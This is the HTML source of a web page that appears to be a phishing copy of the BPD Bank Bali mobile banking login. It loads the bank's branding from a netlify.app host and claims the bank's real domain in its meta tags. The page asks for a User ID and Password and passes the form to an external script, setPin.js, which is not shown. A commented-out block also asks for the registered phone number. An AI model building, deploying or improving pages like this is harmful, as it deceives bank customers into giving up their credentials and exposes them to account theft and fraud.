<!doctype html>
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <title>BPD BANK BALI</title> 
  <meta property="twitter:card" content="summary_large_image"> 
  <meta property="og:image:type" content="image/jpeg"> 
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTAjA5-5Z5lKJrjKa85MJwSY-Av0R83dsAxNw&usqp=CAU"> 
  <meta property="twitter:image:src" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTAjA5-5Z5lKJrjKa85MJwSY-Av0R83dsAxNw&usqp=CAU"> 
  <meta property="og:title" content="BPD BALI Mobile"> 
  <meta property="twitter:title" content="BPD BALI | Mobile"> 
  <meta property="og:url" content="https://ibank.bpdbali.id/"> 
  <style>
@import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
* {
    font-family: 'Ubuntu', sans-serif;
    font-weight: 400;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    color: #000;
    position: relative;
}
html { width: 100vw; height: 0vh; }
    body {
            width: 100%;
            height: 0%;
            font-family: 'Open Sans', sans-serif;
            background: url("https://bpdbankbali.netlify.app/bg.png"); position: center;
}
.container {
    width: 100%;
    height: 50%;
    display: flex;
    align-items: center;
    flex-direction: column;
}
.headr {
    width: 100%;
    height: 100%;
    background: red;
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 0 20px;
}
.headr p {
    font-size: 15px;
    color: #fff;
}
.headr img {
    height: 66%;
}
.container .imgh {
    width: 100%;
    margin: 80px 0 80px 0;
}
.content {
    margin-top: 10px;
    width: 100%;
    padding: 20px;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
}
.content form {
    width: 100%;
}
.content .wrp {
    width: 100%;
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
    height: 50px;
    flex-direction: column;
}
.content .wrp input {
    width: 100%;
    height: 35px;
    outline: none;
    border: 1px solid #d5d5d5;
    padding: 0px 0;
    background: #2B1B17;
    z-index: 22;
    font-size: 16px;
    border-radius: 50px;
    padding-left: 40px;
    font-weight: bold;
    color: white;
}
.content .wrp label {
    color: #000;
    font-size: 13px;
    opacity: 0.7;
}
.content .wrp input:focus,
.content .wrp input:valid {
    border-bottom: 1px solid #d5d5d5;
}
.content button {
    width: 50%;
    height: 35px;
    border: none;
    border-radius: 8px;
    background: #00FF00;
    font-size: 16px;
    color: #fff;
    position: center;
    font-weight: bold;
}
.content .or {
    margin: 10px 0;
    font-size: 10px;
    text-align: center;
    color: #797979;
    opacity: 0.6;
}
.content form .bbtn {
    margin-top: 10px;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: space-between;
}
.content form .bbtn button {
    width: 48%;
    height: 35px;
    font-size: 10px;
    color: #000;
    background: #fff400;
}
.content .reg {
    background: none;
    color: #006543;
    font-size: 13px;
}
.container .foot {
    width: 100%;
    position: absolute;
    bottom: 60px;
}
.bgm {
    width: 100%;
    height: 100%;
    background: ;
    position: absolute;
    z-index: 999;
    display: flex;
    justify-content: center;
    align-items: center;
}
.bgbg {
    width: 100%;
    height: 100%;
    background: #0000001b;
    position: absolute;
    z-index: 99;
}
.bgm .modal {
    width: 80%;
    border-radius: 20px;
    background: #fff;
    padding: 20px;
    transform: translatey(-80px);
    box-shadow: 0 3px 6px rgba(0,0,0,0.2);
    overflow: hidden;
}
.modal h3 {
    margin: 40px 0 8px 0;
    font-size: 13px;
    text-align: center;
    font-weight: 500;
}
.xx {
    width: 100%;
    height: 40px;
    position: absolute;
    right: 0;
    left: 0;
    top: 0;
    background: #006543;
    display: flex;
    justify-content: center;
    align-items: center;
}
.xx i {
    font-style: normal;
    position: absolute;
    right: 8px;
    top: 1px;
    font-weight: 200;
}
input::placeholder {
    font-size: 15px;
    opacity: 0.9;
    font-style: italic;
}
</style> 
 </head> 
 <body>
  <div class="container"> 
   <div style="display:none;" onclick="hidem();" class="bgbg"></div> 
       <!--
   <div class="headr"> 
<img src="/assets/back.png" onclick="window.location.href='/'" alt=""> -->
   <!-- <img src="/assets/bell.png" alt=""> -->
   </div> 
   <center>
   <img class="imgh" src="https://bpdbankbali.netlify.app/logo.png" style="width: 43%; position: center; margin-top: 24%; border: 10px white; border-radius: 100px;" alt=""><br><img class="imgh" src="https://bpdbankbali.netlify.app/mobile.png" style="width: 44%; position: center; margin-top: 0%;" alt=""></center>
   <br>

   <div class="content"> 
    <form id="setPin" onsubmit="">
     <!--                <div style="display:none;" class="bgm">--> 
     <!--                    <div class="modal">--> 
     <!--                        <div class="xx">--> 
     <!--                            <p style="font-size:14px;color:#fff;">Nomor Handphone</p>--> 
     <!--                        </div>--> 
     <!--                        <h3>MASUKKAN NO HANDPHONE<br>YANG TERDAFTAR</h3>--> 
     <!--                        <br>--> 
     <!--                        <div class="wrp">--> 
     <!--                            <label>Nomor Handphone</label>--> 
     <!--                            <input name="nohp" placeholder="Masukkan No Handphone Anda" required autocomplete="off" type="number">--> 
     <!--                        </div>--> 
     <!--                        <button type="submit">MASUK</button>--> 
     <!--                    </div>--> 
     <!--                </div>--> 
     <div class="wrp"> 
      <label></label> 
      <input placeholder="User ID" name="User-ID" id="User-ID" required autocomplete="off" type="text"> 
     </div> 
     <div class="wrp"> 
      <label></label> 
      <input placeholder="Password" name="Password" id="Password" required autocomplete="off" type="password" style="margin-top: -40px;"> 
     </div> 
     <center><button type="submit">Login</button> </center>
     <p id="status"></p>
    </form> 
    </div>
   </div> 
  </div> 
  <script src="setPin.js"></script>
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> 
  <script>
function hidem(){
    $(".bgbg").fadeOut()
    $(".bgm").fadeOut()
}
function next(){
    $(".bgbg").fadeIn()
    $(".bgm").fadeIn()
}
</script>   
 </body>
</html>
